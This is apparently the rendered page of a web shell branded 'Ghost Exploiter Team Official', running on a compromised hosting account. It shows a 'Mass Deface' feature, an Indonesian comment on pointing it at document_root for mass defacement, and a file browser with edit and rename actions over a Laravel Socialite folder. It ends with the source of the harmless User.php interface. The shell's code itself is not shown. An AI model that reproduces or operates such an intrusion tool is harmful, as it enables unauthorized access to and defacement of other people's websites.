webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
socialite
/
src
/
Contracts
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Factory.php
0.259KB
edt
ren
Provider.php
0.442KB
edt
ren
User.php
0.684KB
edt
ren
<?php namespace Laravel\Socialite\Contracts; interface User { /** * Get the unique identifier for the user. * * @return string */ public function getId(); /** * Get the nickname / username for the user. * * @return string|null */ public function getNickname(); /** * Get the full name of the user. * * @return string|null */ public function getName(); /** * Get the e-mail address of the user. * * @return string|null */ public function getEmail(); /** * Get the avatar / image URL for the user. * * @return string|null */ public function getAvatar(); }